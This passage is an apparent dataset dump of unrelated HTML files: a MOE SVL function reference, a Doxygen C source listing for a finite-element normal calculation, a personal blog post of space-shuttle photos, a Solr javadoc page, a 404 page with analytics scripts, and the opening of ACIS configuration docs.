<td><tt>msg_key <> 0</tt></td>
<td>Destroys message</td>
<td>Modifies message</td>
</tr>
</table>
</center>
<p>Whenever <tt>Message</tt> is called with
<tt>'message'</tt><><tt>[]</tt>, <tt>'message'</tt> is displayed in
the MOE Window. The message is removed as soon as the task
that created the message is completed. As a consequence, a call to
<tt>Message</tt> at the CLI on its own will result in the
associated message token being put up and removed in such rapid
succession that the message will not appear to have been displayed in the
MOE window at all.
<p>Messages are meant to be used within a
function that wants to display progress messages while a long
operation is being performed. The key of the message is returned if the
message survived the operation (the message was not destroyed).</p>
<p>The following function illustrates the use of the <tt>Message</tt>
function: </p>
<pre>
global function message_example []
local msgkey = <span class="fcndef">Message</span> [ 0, 'Performing a long operation' ];
// msgkey is destroyed when the task is finished.
// Sleep here for 5 seconds in order to see the
// message in the MOE Window.
sleep 5;
endfunction
</pre>
<h2>See Also</h2>
<p>
<a class="svl" href="../../svl/svlgui/fcnref/beep.html">Beep</a><br />
<a class="svl" href="../../svl/svlgui/fcnref/yesno.html">NoYes</a><br />
<a class="svl" href="../../svl/svlgui/fcnref/yesno.html">OKCancel</a><br />
<a class="svl" href="quit.html">Quit</a><br />
<a class="svl" href="../../svl/svlgui/fcnref/yesno.html">YesNo</a><br />
<a class="svl" href="../../svl/svlgui/fcnref/yesno.html">YesNoCancel</a><br />
<a class="svl" href="../../svl/svlgui/fcnref/yesno.html">Warning</a>
</p>
<p><a href="../../index.htm">MOE Table of Contents</a> <a href="../../fcnindex.html">SVL Function Index</a></p>
<hr noshade="noshade" />
<a href="http://www.chemcomp.com"><img src="../../images/flogo.gif"
alt="CCG Logo"
align="left" width="30" height="30" border="1" hspace="5" vspace="3" /></a>
<font size="2">
<a href="../../legal.html">Copyright</a> © 1997-2010
<a href="http://www.chemcomp.com">Chemical Computing Group Inc.</a><br />
<a href="mailto:info@chemcomp.com"><i>info@chemcomp.com</i></a>
</font>
</body>
</html>
|
docs/html/getLocalNormal__tria6_8c-source.html
|
carlosrosales/thsolver
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>thSolver v1.0: /home/carlos/Work/Code+Data/Publicly Released Code/v1.0/dep/src/getLocalNormal_tria6.c Source File</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
<link href="tabs.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.4.6 -->
<div class="tabs">
<ul>
<li><a href="index.html"><span>Main Page</span></a></li>
<li id="current"><a href="files.html"><span>Files</span></a></li>
</ul></div>
<div class="tabs">
<ul>
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>Globals</span></a></li>
</ul></div>
<h1>/home/carlos/Work/Code+Data/Publicly Released Code/v1.0/dep/src/getLocalNormal_tria6.c</h1><a href="getLocalNormal__tria6_8c.html">Go to the documentation of this file.</a><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">/******************************************************************************</span>
<a name="l00002"></a>00002 <span class="comment">* File : getLocalNormal_tria6.c *</span>
<a name="l00003"></a>00003 <span class="comment">* Author : Carlos Rosales Fernandez (carlos@ihpc.a-star.edu.sg) *</span>
<a name="l00004"></a>00004 <span class="comment">* Date : 01-09-2006 *</span>
<a name="l00005"></a>00005 <span class="comment">* Revision : 1.0 *</span>
<a name="l00006"></a>00006 <span class="comment">*******************************************************************************</span>
<a name="l00007"></a>00007 <span class="comment">* DESCRIPTION *</span>
<a name="l00008"></a>00008 <span class="comment">* Returns the unit normal[] vector at a local evaluation point given by L[] *</span>
<a name="l00009"></a>00009 <span class="comment">* that is interior to the element with global coordinates X[NODE][COORDINATE].*</span>
<a name="l00010"></a>00010 <span class="comment">* Works for quadratic interpolation in triangular elements (6-noded triangles)*</span>
<a name="l00011"></a>00011 <span class="comment">******************************************************************************/</span>
<a name="l00012"></a>00012
<a name="l00013"></a>00013 <span class="comment">/******************************************************************************</span>
<a name="l00014"></a>00014 <span class="comment">* COPYRIGHT & LICENSE INFORMATION *</span>
<a name="l00015"></a>00015 <span class="comment">* *</span>
<a name="l00016"></a>00016 <span class="comment">* Copyright 2006 Carlos Rosales Fernandez and The Institute of High *</span>
<a name="l00017"></a>00017 <span class="comment">* Performance Computing (A*STAR) *</span>
<a name="l00018"></a>00018 <span class="comment">* *</span>
<a name="l00019"></a>00019 <span class="comment">* This file is part of depSolver. *</span>
<a name="l00020"></a>00020 <span class="comment">* *</span>
<a name="l00021"></a>00021 <span class="comment">* depSolver is free software; you can redistribute it and/or modify *</span>
<a name="l00022"></a>00022 <span class="comment">* it under the terms of the GNU General Public License as published by *</span>
<a name="l00023"></a>00023 <span class="comment">* the Free Software Foundation; either version 2 of the License, or *</span>
<a name="l00024"></a>00024 <span class="comment">* (at your option) any later version. *</span>
<a name="l00025"></a>00025 <span class="comment">* *</span>
<a name="l00026"></a>00026 <span class="comment">* depSolver is distributed in the hope that it will be useful, *</span>
<a name="l00027"></a>00027 <span class="comment">* but WITHOUT ANY WARRANTY; without even the implied warranty of *</span>
<a name="l00028"></a>00028 <span class="comment">* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *</span>
<a name="l00029"></a>00029 <span class="comment">* GNU General Public License for more details. *</span>
<a name="l00030"></a>00030 <span class="comment">* *</span>
<a name="l00031"></a>00031 <span class="comment">* You should have received a copy of the GNU General Public License *</span>
<a name="l00032"></a>00032 <span class="comment">* along with depSolver; if not, write to the Free Software *</span>
<a name="l00033"></a>00033 <span class="comment">* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA *</span>
<a name="l00034"></a>00034 <span class="comment">******************************************************************************/</span>
<a name="l00035"></a>00035
<a name="l00036"></a>00036 <span class="preprocessor">#include <stdio.h></span>
<a name="l00037"></a>00037 <span class="preprocessor">#include <stdlib.h></span>
<a name="l00038"></a>00038 <span class="preprocessor">#include <math.h></span>
<a name="l00039"></a>00039
<a name="l00040"></a><a class="code" href="integral__tria6_8h.html#ab3dfb95b698f597fe5d2e0a084a0e76">00040</a> <span class="keywordtype">int</span> <a class="code" href="getLocalNormal__tria6_8c.html#ab3dfb95b698f597fe5d2e0a084a0e76">getLocalNormal_tria6</a>(<span class="keywordtype">double</span> *L, <span class="keywordtype">double</span> X[6][3], <span class="keywordtype">double</span> *normal)
<a name="l00041"></a>00041 {
<a name="l00042"></a>00042 <span class="keywordtype">double</span> ax, ay, az, dx1, dx2, dy1, dy2, dz1, dz2, L1, L2, normalmod;
<a name="l00043"></a>00043
<a name="l00044"></a>00044 <span class="comment">/* Auxiliar quantities */</span>
<a name="l00045"></a>00045 L1 = L[0];
<a name="l00046"></a>00046 L2 = L[1];
<a name="l00047"></a>00047 ax = X[1][0] - X[3][0] + X[4][0] - X[5][0];
<a name="l00048"></a>00048 ay = X[1][1] - X[3][1] + X[4][1] - X[5][1];
<a name="l00049"></a>00049 az = X[1][2] - X[3][2] + X[4][2] - X[5][2];
<a name="l00050"></a>00050
<a name="l00051"></a>00051 <span class="comment">/* Derivatives of (x,y,z) with respect to L1 and L2 */</span>
<a name="l00052"></a>00052 dx1 = 4.0*(L1*(X[0][0] + X[4][0] - 2.0*X[5][0]) + L2*ax + X[5][0]) - X[0][0] - 3.0*X[4][0];
<a name="l00053"></a>00053 dx2 = 4.0*(L1*ax + L2*(X[2][0] + X[4][0] - 2.0*X[3][0]) + X[3][0]) - X[2][0] - 3.0*X[4][0];
<a name="l00054"></a>00054 dy1 = 4.0*(L1*(X[0][1] + X[4][1] - 2.0*X[5][1]) + L2*ay + X[5][1]) - X[0][1] - 3.0*X[4][1];
<a name="l00055"></a>00055 dy2 = 4.0*(L1*ay + L2*(X[2][1] + X[4][1] - 2.0*X[3][1]) + X[3][1]) - X[2][1] - 3.0*X[4][1];
<a name="l00056"></a>00056 dz1 = 4.0*(L1*(X[0][2] + X[4][2] - 2.0*X[5][2]) + L2*az + X[5][2]) - X[0][2] - 3.0*X[4][2];
<a name="l00057"></a>00057 dz2 = 4.0*(L1*az + L2*(X[2][2] + X[4][2] - 2.0*X[3][2]) + X[3][2]) - X[2][2] - 3.0*X[4][2];
<a name="l00058"></a>00058
<a name="l00059"></a>00059 <span class="comment">/* Normal components and modulus (inverted) */</span>
<a name="l00060"></a>00060 normal[0] = dy1*dz2 - dy2*dz1;
<a name="l00061"></a>00061 normal[1] = dx2*dz1 - dx1*dz2;
<a name="l00062"></a>00062 normal[2] = dx1*dy2 - dx2*dy1;
<a name="l00063"></a>00063 normalmod = 1.0/sqrt(normal[0]*normal[0] + normal[1]*normal[1] + normal[2]*normal[2]);
<a name="l00064"></a>00064
<a name="l00065"></a>00065 <span class="comment">/* Get unit normal */</span>
<a name="l00066"></a>00066 normal[0] = normal[0]*normalmod;
<a name="l00067"></a>00067 normal[1] = normal[1]*normalmod;
<a name="l00068"></a>00068 normal[2] = normal[2]*normalmod;
<a name="l00069"></a>00069
<a name="l00070"></a>00070 <span class="keywordflow">return</span> 0;
<a name="l00071"></a>00071 }
<a name="l00072"></a>00072
</pre></div><hr size="1"><address style="align: right;"><small>Generated on Fri Sep 1 18:53:06 2006 for thSolver v1.0 by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.4.6 </small></address>
</body>
</html>
|
_site/general/sts-114-photos.html
|
jottley/jottley.github.io
|
<!doctype html>
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
<!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie9 lt-ie8" lang="en"><![endif]-->
<!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie9" lang="en"><![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en"><!--<![endif]-->
<head>
<meta charset="utf-8">
<title>STS-114 Photos – I exist as I am</title>
<meta name="description" content="">
<meta name="keywords" content="">
<!-- Twitter Cards -->
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://localhost:4000/images/">
<meta name="twitter:title" content="STS-114 Photos">
<meta name="twitter:description" content="">
<meta name="twitter:creator" content="@jottley">
<!-- Open Graph -->
<meta property="og:locale" content="en_US">
<meta property="og:type" content="article">
<meta property="og:title" content="STS-114 Photos">
<meta property="og:description" content="">
<meta property="og:url" content="http://localhost:4000/general/sts-114-photos">
<meta property="og:site_name" content="I exist as I am">
<link rel="canonical" href="http://localhost:4000/general/sts-114-photos">
<link href="http://localhost:4000/feed.xml" type="application/atom+xml" rel="alternate" title="I exist as I am Feed">
<!-- http://t.co/dKP3o1e -->
<meta name="HandheldFriendly" content="True">
<meta name="MobileOptimized" content="320">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Google Webfonts -->
<link href='http://fonts.googleapis.com/css?family=PT+Sans+Narrow:400,700|PT+Serif:400,700,400italic' rel='stylesheet' type='text/css'>
<!-- For all browsers -->
<link rel="stylesheet" href="http://localhost:4000/assets/css/main.min.css">
<!--[if (lt IE 9) & (!IEMobile)]>
<link rel="stylesheet" href="http://localhost:4000/assets/css/ie.min.css">
<![endif]-->
<meta http-equiv="cleartype" content="on">
<!-- Load Modernizr -->
<script src="http://localhost:4000/assets/js/modernizr.js"></script>
<!-- Icons -->
<!-- 16x16 -->
<link rel="shortcut icon" href="http://localhost:4000/favicon.ico">
<!-- 32x32 -->
<link rel="shortcut icon" href="http://localhost:4000/favicon.png">
<!-- 57x57 (precomposed) for iPhone 3GS, pre-2011 iPod Touch and older Android devices -->
<link rel="apple-touch-icon-precomposed" href="http://localhost:4000/images/apple-touch-icon-precomposed.png">
<!-- 72x72 (precomposed) for 1st generation iPad, iPad 2 and iPad mini -->
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="http://localhost:4000/images/apple-touch-icon-72x72-precomposed.png">
<!-- 114x114 (precomposed) for iPhone 4, 4S, 5 and post-2011 iPod Touch -->
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="http://localhost:4000/images/apple-touch-icon-114x114-precomposed.png">
<!-- 144x144 (precomposed) for iPad 3rd and 4th generation -->
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://localhost:4000/images/apple-touch-icon-144x144-precomposed.png">
</head>
<body class="article" itemscope itemtype="http://schema.org/WebPage">
<!--[if lt IE 9]><div class="browser-upgrade alert alert-info">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</div><![endif]-->
<div id="outer-wrap">
<div id="inner-wrap">
<header id="top" role="banner">
<div class="block">
<h1 class="block-title">I exist as I am</h1>
<a class="nav-btn" id="nav-open-btn" href="#nav">Navigation</a>
</div>
</header>
<nav id="nav" role="navigation">
<div class="block">
<h2 class="block-title">Chapters</h2>
<ul>
<li><a href="http://localhost:4000/" >Home</a></li>
<li><a href="http://localhost:4000/about/" >About</a></li>
<li><a href="http://localhost:4000/articles/" >Articles</a></li>
<li><a href="http://localhost:4000/feed.xml" title="Atom/RSS feed">Feed</a>
</ul>
<a class="close-btn" id="nav-close-btn" href="#top">Return to Content</a>
</div>
</nav>
<div id="main" role="main" itemprop="mainContentOfPage" itemscope itemtype="http://schema.org/Blog">
<div class="article-author-side">
<img src="http://localhost:4000/images/photo.JPG" class="bio-photo" alt="Jared Ottley bio photo"></a>
<h3>Jared Ottley</h3>
<p>Jared Ottley is a Tech Lead Engineer and Salesforce SME at <a href='http://www.alfresco.com'>Alfresco</a>. To wind down he coaches lacrosse Springville High School. As the father of 6 he is raising a geek army. He has a degree in Political Science and drives a Mini.</p>
<a href="mailto:jared@ottleys.net" class="author-social"><i class="icon-mail"></i> jared@ottleys.net</a>
<a href="http://twitter.com/jottley" class="author-social" target="_blank"><i class="icon-twitter"></i> Twitter</a>
<a href="http://facebook.com/jottley" class="author-social" target="_blank"><i class="icon-facebook"></i> Facebook</a>
<a href="http://linkedin.com/in/jottley" class="author-social" target="_blank"><i class="icon-linkedin"></i> LinkedIn</a>
<a href="http://instagram.com/jaredrottley" class="author-social" target="_blank"><i class="icon-instagram"></i> Instagram</a>
<a href="http://github.com/jottley" class="author-social" target="_blank"><i class="icon-github"></i> Github</a>
<a href="http://lastfm.com/user/jottley" class="author-social" target="_blank"><i class="icon-lastfm"></i> Last.fm</a>
<a href="http://www.flickr.com/photos/jottley" class="author-social" target="_blank"><i class="icon-flickr"></i> Flickr</a>
</div>
<article itemscope itemtype="http://schema.org/BlogPosting" itemprop="blogPost">
<div class="headline-wrap">
<h1 itemprop="name">STS-114 Photos</h1>
<h2></h2>
</div><!--/ .headline-wrap -->
<div class="article-wrap" itemprop="text">
<p>Dad sent some photos from STS-114. These are some pretty nice shots.</p>
<div align="center">
<a href="http://jared.ottleys.net/archives/images/8H8P0558.jpg" rel="lightbox[75]"><img src="http://jared.ottleys.net/archives/images/8H8P0558.jpg" height="141" width="213" alt="" /></a> <a href="http://jared.ottleys.net/archives/images/8S2S6825_Discoveryhead-on.jpg" rel="lightbox[75]"><img src="http://jared.ottleys.net/archives/images/8S2S6825_Discoveryhead-on.jpg" height="141" width="213" alt="" /></a>
</div>
<div align="center">
<a href="http://jared.ottleys.net/archives/images/steve.jpg" rel="lightbox[75]"><img src="http://jared.ottleys.net/archives/images/steve.jpg" height="145" width="213" alt="" /></a> <a href="http://jared.ottleys.net/archives/images/steve5.jpg" rel="lightbox[75]"><img src="http://jared.ottleys.net/archives/images/steve5.jpg" height="145" width="213" alt="" /></a>
</div>
<div align="center">
<a href="http://jared.ottleys.net/archives/images/steve3.jpg" rel="lightbox[75]"><img src="http://jared.ottleys.net/archives/images/steve3.jpg" height="213" width="145" alt="" /></a> <a href="http://jared.ottleys.net/archives/images/steve4.jpg" rel="lightbox[75]"><img src="http://jared.ottleys.net/archives/images/steve4.jpg" height="213" width="145" alt="" /></a>
</div>
<hr />
<footer role="contentinfo">
<div class="article-author-bottom">
<img src="http://localhost:4000/images/photo.JPG" class="bio-photo" alt="Jared Ottley bio photo"></a>
<h3>Jared Ottley</h3>
<p>Jared Ottley is a Tech Lead Engineer and Salesforce SME at <a href='http://www.alfresco.com'>Alfresco</a>. To wind down he coaches lacrosse Springville High School. As the father of 6 he is raising a geek army. He has a degree in Political Science and drives a Mini.</p>
<a href="mailto:jared@ottleys.net" class="author-social"><i class="icon-mail"></i> jared@ottleys.net</a>
<a href="http://twitter.com/jottley" class="author-social" target="_blank"><i class="icon-twitter"></i> Twitter</a>
<a href="http://facebook.com/jottley" class="author-social" target="_blank"><i class="icon-facebook"></i> Facebook</a>
<a href="http://linkedin.com/in/jottley" class="author-social" target="_blank"><i class="icon-linkedin"></i> LinkedIn</a>
<a href="http://instagram.com/jaredrottley" class="author-social" target="_blank"><i class="icon-instagram"></i> Instagram</a>
<a href="http://github.com/jottley" class="author-social" target="_blank"><i class="icon-github"></i> Github</a>
<a href="http://lastfm.com/user/jottley" class="author-social" target="_blank"><i class="icon-lastfm"></i> Last.fm</a>
<a href="http://www.flickr.com/photos/jottley" class="author-social" target="_blank"><i class="icon-flickr"></i> Flickr</a>
</div>
<p class="byline"><strong>STS-114 Photos</strong> was published on <time datetime="2005-08-10T00:00:00-06:00" itemprop="datePublished">August 10, 2005</time> by <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span itemprop="name"><a href="http://localhost:4000/about" title="About Jared Ottley" itemprop="url">Jared Ottley</a></span></span>.</p>
</footer>
</div><!-- /.article-wrap -->
</article>
</div><!-- /#main -->
<div class="footer-wrap">
<div class="related-articles">
<h4>You might also enjoy <small class="pull-right">(<a href="http://localhost:4000/articles">View all articles</a>)</small></h4>
<ul>
</ul>
<hr />
</div><!-- /.related-articles -->
<footer>
<span>© 2020 Jared Ottley. The thoughts here are my own and are not my employers...so blame me.</span>
</footer>
</div><!-- /.footer-wrap -->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="http://localhost:4000/assets/js/vendor/jquery-1.9.1.min.js"><\/script>')</script>
<script src="http://localhost:4000/assets/js/scripts.min.js"></script>
<script src="http://localhost:4000/assets/js/main.js"></script>
<!-- Asynchronous Google Analytics snippet -->
<script>
var _gaq = _gaq || [];
var pluginUrl =
'//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);
_gaq.push(['_setAccount', 'UA-73397-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</body>
</html>
|
solr-5.0.0/docs/solr-uima/serialized-form.html
|
annieweng/solr_example
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_55) on Sun Feb 15 12:27:27 PST 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="utf-8">
<title>Serialized Form (Solr 5.0.0 API)</title>
<meta name="date" content="2015-02-15">
<link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Serialized Form (Solr 5.0.0 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="overview-summary.html">Overview</a></li>
<li><a href="org/apache/solr/uima/processor/package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li><a href="org/apache/solr/uima/processor/package-tree.html">Tree</a></li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?serialized-form.html" target="_top">Frames</a></li>
<li><a href="serialized-form.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 title="Serialized Form" class="title">Serialized Form</h1>
</div>
<div class="serializedFormContainer">
<ul class="blockList">
<li class="blockList">
<h2 title="Package">Package org.apache.solr.uima.processor</h2>
<ul class="blockList">
<li class="blockList"><a name="org.apache.solr.uima.processor.FieldMappingException">
<!-- -->
</a>
<h3>Class <a href="org/apache/solr/uima/processor/FieldMappingException.html" title="class in org.apache.solr.uima.processor">org.apache.solr.uima.processor.FieldMappingException</a> extends <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Exception.html?is-external=true" title="class or interface in java.lang">Exception</a> implements Serializable</h3>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="overview-summary.html">Overview</a></li>
<li><a href="org/apache/solr/uima/processor/package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li><a href="org/apache/solr/uima/processor/package-tree.html">Tree</a></li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?serialized-form.html" target="_top">Frames</a></li>
<li><a href="serialized-form.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright © 2000-2015 Apache Software Foundation. All Rights Reserved.</i>
<script src='/prettify.js' type='text/javascript'></script>
<script type='text/javascript'>
(function(){
var oldonload = window.onload;
if (typeof oldonload != 'function') {
window.onload = prettyPrint;
} else {
window.onload = function() {
oldonload();
prettyPrint();
}
}
})();
</script>
</small></p>
</body>
</html>
|
404.html
|
TheAdamGalloway/TheAdamGalloway.github.io
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Page Not Found :(</title>
<style>
::-moz-selection {
background: #b3d4fc;
text-shadow: none;
}
::selection {
background: #b3d4fc;
text-shadow: none;
}
html {
padding: 30px 10px;
font-size: 20px;
line-height: 1.4;
color: #737373;
background: #f0f0f0;
-webkit-text-size-adjust: 100%;
-ms-text-size-adjust: 100%;
}
html,
input {
font-family: "Tauri", Helvetica, Arial, sans-serif;
}
body {
max-width: 500px;
_width: 500px;
padding: 30px 20px 50px;
border: 1px solid #b3b3b3;
border-radius: 4px;
margin: 0 auto;
box-shadow: 0 1px 10px #a7a7a7, inset 0 1px 0 #fff;
background: #fcfcfc;
}
h1 {
margin: 0 10px;
font-size: 50px;
text-align: center;
}
h1 span {
color: #bbb;
}
h3 {
margin: 1.5em 0 0.5em;
}
p {
margin: 1em 0;
}
ul {
padding: 0 0 0 40px;
margin: 1em 0;
}
.container {
max-width: 380px;
_width: 380px;
margin: 0 auto;
}
/* google search */
#goog-fixurl ul {
list-style: none;
padding: 0;
margin: 0;
}
#goog-fixurl form {
margin: 0;
}
#goog-wm-qt,
#goog-wm-sb {
border: 1px solid #bbb;
font-size: 16px;
line-height: normal;
vertical-align: top;
color: #444;
border-radius: 2px;
}
#goog-wm-qt {
width: 220px;
height: 20px;
padding: 5px;
margin: 5px 10px 0 0;
box-shadow: inset 0 1px 1px #ccc;
}
#goog-wm-sb {
display: inline-block;
height: 32px;
padding: 0 10px;
margin: 5px 0 0;
white-space: nowrap;
cursor: pointer;
background-color: #f5f5f5;
background-image: -webkit-linear-gradient(rgba(255,255,255,0), #f1f1f1);
background-image: -moz-linear-gradient(rgba(255,255,255,0), #f1f1f1);
background-image: -ms-linear-gradient(rgba(255,255,255,0), #f1f1f1);
background-image: -o-linear-gradient(rgba(255,255,255,0), #f1f1f1);
-webkit-appearance: none;
-moz-appearance: none;
appearance: none;
*overflow: visible;
*display: inline;
*zoom: 1;
}
#goog-wm-sb:hover,
#goog-wm-sb:focus {
border-color: #aaa;
box-shadow: 0 1px 1px rgba(0, 0, 0, 0.1);
background-color: #f8f8f8;
}
#goog-wm-qt:hover,
#goog-wm-qt:focus {
border-color: #105cb6;
outline: 0;
color: #222;
}
input::-moz-focus-inner {
padding: 0;
border: 0;
}
</style>
</head>
<body>
<div class="container">
<h1>Not found <span>:(</span></h1>
<p>Sorry, but the page you were trying to view does not exist.</p>
<p>It looks like this was the result of either:</p>
<ul>
<li>a mistyped address</li>
<li>an out-of-date link</li>
</ul>
<script>
var GOOG_FIXURL_LANG = (navigator.language || '').slice(0,2),GOOG_FIXURL_SITE = location.host;
</script>
<script src="//linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
</div>
<!-- Start of StatCounter Code for Default Guide -->
<script type="text/javascript">
var sc_project=10071736;
var sc_invisible=1;
var sc_security="57881cbb";
var scJsHost = (("https:" == document.location.protocol) ?
"https://secure." : "http://www.");
document.write("<sc"+"ript type='text/javascript' src='" +
scJsHost+
"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="click tracking"
href="http://statcounter.com/" target="_blank"><img
class="statcounter"
src="http://c.statcounter.com/10071736/0/57881cbb/1/"
alt="click tracking"></a></div></noscript>
<!-- End of StatCounter Code for Default Guide -->
</body>
</html>
|
doc/conf.html
|
kurmanka/acis.r
|
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ACIS configuration / ACIS documentation</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<h1 id="idp662240">ACIS configuration</h1>
<h3><i>Table of contents</i></h3>
<p class="toc"> <a href="#mainconf">The <code class="C">main.conf</code> file</a><br> <a href="#idp666000">Parameters</a><br> <a href="#idp666400">Core</a><br> <a href="#idp689408">Perl</a><br> <a href="#idp699792">Database parameters</a><br> <a href="#idp706608">Data input (primary metadata: research, institutions, citations, etc.)</a><br> <a href="#idp717360">Data output (personal data and submitted institutions)</a><br> <a href="#conf-research">Research profile</a><br> <a href="#conf-fuzzy">Fuzzy search</a><br> <a href="#apu-conf">APU</a><br> <a href="#cit-screen-conf">Citations screens</a><br> <a href="#idp768048">Logging, debugging and performance profiling</a><br> <a href="#idp778576">Other</a><br> <a href="#binsetup">Updating a running system's configuration -- <code class="C">bin/setup</code> utility</a><br></p>
<h2 id="mainconf" C="main.conf">The <code class="C">main.conf</code> file</h2>
<p>The primary configuration file of an ACIS installation is
<code>main.conf</code>. This file is an AppConfig file, which
means it has a simple parameter=value syntax, described in
detail in <a href="http://search.cpan.org/~abw/AppConfig/lib/AppConfig.pm">AppConfig
manpage</a>.
There is an example of such file in <a class="f" href="internal.html#mainconfeg">main.conf.eg</a> in
ACIS home directory.</p>
<h2 id="idp666000">Parameters</h2>
<h3 id="idp666400">Core</h3>
<dl>
<dt id="site-name" C="site-name"><code class="C">site-name</code></dt>
<dd>
Short name of your website. Will be used in generated page
titles as a prefix, in emails as [part] of subject lines.
The parameter is required.
</dd>
<dt id="site-name-long" C="site-name-long"><code class="C">site-name-long</code></dt>
<dd>
Full name of the website. Will be shown at the top of each
page and used in emails to refer back to the service.
Required.
</dd>
<dt id="admin-email" C="admin-email"><code class="C">admin-email</code></dt>
<dd>Email address of the site administrator, i.e. yourself.
Required.</dd>
<dt id="base-url" C="base-url"><code class="C">base-url</code></dt>
<dd>URL of the ACIS CGI script. If you want ACIS to respond
at the top-level URL of your website, set this to something
like <code>http://web.site.org</code>. But then you need to
configure your web server accordingly. <a href="apache-conf.html#acis-site-top">How to do that in
Apache.</a> Do not put a trailing slash into this value. If
you get this value wrong, ACIS will not correctly interpret
users' requests. Required.</dd>
<dt id="base-cgi-script-filename" C="base-cgi-script-filename"><code class="C">base-cgi-script-filename</code></dt>
<dd>Filename of the CGI script, which ACIS creates and which
is accessible through the <a class="c" href="conf.html#base-url">base-url</a> URL.
</dd>
<dt id="base-fcgi-script-filename" C="base-fcgi-script-filename"><code class="C">base-fcgi-script-filename</code></dt>
<dd>Filename of the FCGI script, which ACIS creates and which
is accessible through the <a class="c" href="conf.html#base-url">base-url</a> URL.
Required</dd>
<dt id="home-url" C="home-url"><code class="C">home-url</code></dt>
<dd>URL of the public homepage of the service. Value of
<a class="c" href="conf.html#site-name-long">site-name-long</a>, displayed on each page will link to
it. May be the same as base-url or different. Required.</dd>
<dt id="static-base-url" C="static-base-url"><code class="C">static-base-url</code></dt>
<dd>URL of web-accessible directory for ACIS to store its
static web-accessible files. ACIS will use it for
JavaScript and CSS files, personal profile pages, et cetera.
It may be the same as <a class="c" href="conf.html#base-url">base-url</a>, but you'll need to
